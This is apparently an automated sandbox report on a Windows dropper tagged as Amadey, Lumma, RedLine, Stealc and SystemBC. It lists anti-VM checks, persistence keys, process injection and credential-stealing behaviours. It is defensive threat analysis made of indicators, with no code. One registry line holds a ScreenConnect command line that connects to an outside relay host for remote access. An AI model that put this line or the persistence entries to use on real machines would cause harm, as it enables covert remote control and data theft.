Malware Analysis Report

2025-04-03 09:13

Sample ID 250227-e3sdsavxet
Target daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe
SHA256 daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30
Tags
amadey gcleaner lumma redline stealc systembc 092155 a4d2cd reno testproliv credential_access defense_evasion discovery execution infostealer loader persistence privilege_escalation spyware stealer trojan
score
10/10

Analysis Overview

Threat Level: Known bad

The file daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe was found to be: Known bad.

Malicious Activity Summary

amadey gcleaner lumma redline stealc systembc 092155 a4d2cd reno testproliv credential_access defense_evasion discovery execution infostealer loader persistence privilege_escalation spyware stealer trojan

Stealc

Gcleaner family

Stealc family

RedLine payload

Systembc family

Amadey

GCleaner

Amadey family

Redline family

RedLine

SystemBC

Lumma Stealer, LummaC

Lumma family

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Uses browser remote debugging

Blocklisted process makes network request

Sets service image path in registry

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Checks BIOS information in registry

Unsecured Credentials: Credentials In Files

Event Triggered Execution: Component Object Model Hijacking

Loads dropped DLL

Checks computer location settings

Identifies Wine through registry keys

Reads data files stored by FTP clients

Reads user/profile data of web browsers

Reads user/profile data of local email clients

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Enumerates connected drives

Suspicious use of SetThreadContext

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

AutoIT Executable

Boot or Logon Autostart Execution: Authentication Package

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Program crash

Browser Information Discovery

System Location Discovery: System Language Discovery

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Modifies data under HKEY_USERS

Enumerates system info in registry

Modifies registry class

Checks processor information in registry

Delays execution with timeout.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Scheduled Task/Job: Scheduled Task

Suspicious use of FindShellTrayWindow

Uses Volume Shadow Copy service COM API

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2025-02-27 04:28

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-02-27 04:28

Reported

2025-02-27 04:30

Platform

win10v2004-20250217-en

Max time kernel

150s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Stealc

stealer stealc

Stealc family

stealc

SystemBC

trojan systembc

Systembc family

systembc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\cxqswdu\bsnjgb.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10038780101\bce8c2f94e.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10038790101\45ab6d7c71.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10038800101\edad866f30.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10000300101\systemdrive.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (3be09d9e5e840c20)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=bbcnas2.zapto.org&p=8041&s=feb3dc3c-6578-4232-a238-57d465576d77&k=[encoded blob removed]&v=[encoded blob removed]&c=test&c=&c=&c=&c=&c=&c=&c=\"" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A

Uses browser remote debugging

credential_access stealer
Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10038780101\bce8c2f94e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\cxqswdu\bsnjgb.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10038790101\45ab6d7c71.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10038800101\edad866f30.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10000300101\systemdrive.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10000300101\systemdrive.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\cxqswdu\bsnjgb.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10038790101\45ab6d7c71.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10038800101\edad866f30.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10038780101\bce8c2f94e.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10038810101\67e0HNq.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038760101\82ca9ecab5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\systemdrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp0PZJULHHMQK22YB4KVAH3HBPL4NYETMR.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\ProgramData\cxqswdu\bsnjgb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038780101\bce8c2f94e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038790101\45ab6d7c71.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038800101\edad866f30.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038810101\67e0HNq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038820101\VBUN8fn.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10000300101\systemdrive.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\ProgramData\cxqswdu\bsnjgb.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10038780101\bce8c2f94e.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10038790101\45ab6d7c71.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10038800101\edad866f30.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine N/A N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine N/A N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine N/A N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\82ca9ecab5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10038760101\\82ca9ecab5.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10038770121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5c86579672.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10038890101\\5c86579672.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fa494a26c4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10038900101\\fa494a26c4.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Boot or Logon Autostart Execution: Authentication Package

persistence privilege_escalation
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800330062006500300039006400390065003500650038003400300063003200300029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3be09d9e5e840c20)\mghrlwds.tmp C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3be09d9e5e840c20)\mghrlwds.newcfg C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 5044 set thread context of 6008 N/A C:\Users\Admin\AppData\Local\Temp\10038780101\bce8c2f94e.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 2140 set thread context of 5520 N/A C:\Users\Admin\AppData\Local\Temp\10038800101\edad866f30.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 12576 set thread context of 12764 N/A N/A
PID 56880 set thread context of 57068 N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsBackstageShell.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsCredentialProvider.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\app.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsAuthenticationPackage.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.en-US.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Client.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsBackstageShell.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsFileManager.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsFileManager.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\system.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Core.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Windows.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.en-US.resources C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Local\Temp\10000300101\systemdrive.exe N/A
File created C:\Windows\Installer\e595a99.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI5B84.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{933D173F-6496-0F7D-53C4-FF46268B901A} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI5CDE.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\wix{933D173F-6496-0F7D-53C4-FF46268B901A}.SchedServiceConfig.rmi C:\Windows\syswow64\MsiExec.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI5BB4.tmp C:\Windows\system32\msiexec.exe N/A
